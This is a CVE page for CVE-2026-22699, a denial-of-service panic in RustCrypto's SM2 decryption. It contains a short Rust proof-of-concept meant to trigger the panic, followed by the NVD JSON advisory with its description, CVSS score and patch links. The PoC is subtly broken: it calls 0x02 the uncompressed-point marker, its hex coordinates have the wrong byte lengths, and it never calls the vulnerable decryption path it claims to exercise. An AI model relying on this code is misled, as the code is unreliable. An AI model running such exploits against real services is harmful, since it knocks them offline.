CVE-2026-22699

// CVE-2026-22699 PoC - SM2 Decryption DoS // This PoC demonstrates triggering panic via invalid SM2 curve point use sm2::{AffinePoint, EncodedPoint}; use elliptic_curve::sec1::ToEncodedPoint; fn main() { // Create an invalid SM2 point that is syntactically valid // but not on the SM2 curve // SM2 curve parameters: p = 0xFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00000000FFFFFFFFFFFFFFFF // a = 0xFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00000000FFFFFFFFFFFFFFFC // b = 0x28E9FA9E9D9F5E344D5A9E4BCF6509A7F39789F515AB8F92DDBCBD414D940E93 let p = "FFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00000000FFFFFFFFFFFFFFFF"; // Invalid point: syntactically valid but not on SM2 curve // Using a point that satisfies coordinate range but not curve equation let invalid_x = "313371F1CE49C6B73F7A37C912B8D7E5A8F6C9D3E4B2A1F0E9D8C7B6A59687".to_uppercase(); let invalid_y = "4F3C2B1A0E9D8C7B6A59687F5E4D3C2B1A0F9E8D7C6B5A4938271605F4E3".to_uppercase(); // Create encoded point format for SM2 let mut encoded = vec![0x02]; // Uncompressed point marker for SM2 encoded.extend_from_slice(&hex::decode(invalid_x).unwrap()); encoded.extend_from_slice(&hex::decode(invalid_y).unwrap()); let encoded_point = EncodedPoint::from_bytes(&encoded).unwrap(); // This will panic in vulnerable versions due to .unwrap() on None // Fixed versions should handle this gracefully let result = AffinePoint::from_encoded_point(&encoded_point); match result { Some(point) => println!("Valid SM2 point: {:?}", point), None => println!("Invalid point detected - should not panic"), } }

{"cve": {"id": "CVE-2026-22699", "sourceIdentifier": "[email protected]", "published": "2026-01-10T06:15:52.377", "lastModified": "2026-01-22T14:53:30.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RustCrypto: Elliptic Curves is general purpose Elliptic Curve Cryptography (ECC) support, including types and traits for representing various elliptic curve forms, scalars, points, and public/secret keys composed thereof. In versions 0.14.0-pre.0 and 0.14.0-rc.0, a denial-of-service vulnerability exists in the SM2 PKE decryption path where an invalid elliptic-curve point (C1) is decoded and the resulting value is unwrapped without checking. Specifically, AffinePoint::from_encoded_point(&encoded_c1) may return a None/CtOption::None when the supplied coordinates are syntactically valid but do not lie on the SM2 curve. The calling code previously used .unwrap(), causing a panic when presented with such input. This issue has been patched via commit 085b7be."}, {"lang": "es", "value": "RustCrypto: Curvas Elípticas es soporte de Criptografía de Curva Elíptica (ECC) de propósito general, incluyendo tipos y rasgos para representar varias formas de curvas elípticas, escalares, puntos y claves públicas/secretas compuestas de ellos. En las versiones 0.14.0-pre.0 y 0.14.0-rc.0, existe una vulnerabilidad de denegación de servicio en la ruta de descifrado SM2 PKE donde un punto de curva elíptica (C1) inválido es decodificado y el valor resultante es desempaquetado sin verificación. Específicamente, AffinePoint::from_encoded_point(&encoded_c1) puede devolver un None/CtOption::None cuando las coordenadas proporcionadas son sintácticamente válidas pero no se encuentran en la curva SM2. El código llamador usaba previamente .unwrap(), causando un pánico cuando se le presentaba dicha entrada. Este problema ha sido parcheado a través del commit 085b7be."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rustcrypto:sm2_elliptic_curve:0.14.0:pre0:*:*:*:rust:*:*", "matchCriteriaId": "5F5BCFE9-1585-4A90-857F-7F9E1B9C9ADA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustcrypto:sm2_elliptic_curve:0.14.0:rc0:*:*:*:rust:*:*", "matchCriteriaId": "B584C50F-8ED4-45F4-8799-7CCFE8D4DF66"}]}]}], "references": [{"url": "https://github.com/RustCrypto/elliptic-curves/commit/085b7bee647029bd189e1375203418205006bcab", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/RustCrypto/elliptic-curves/pull/1602", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-78p6-6878-8mj6", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-78p6-6878-8mj6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}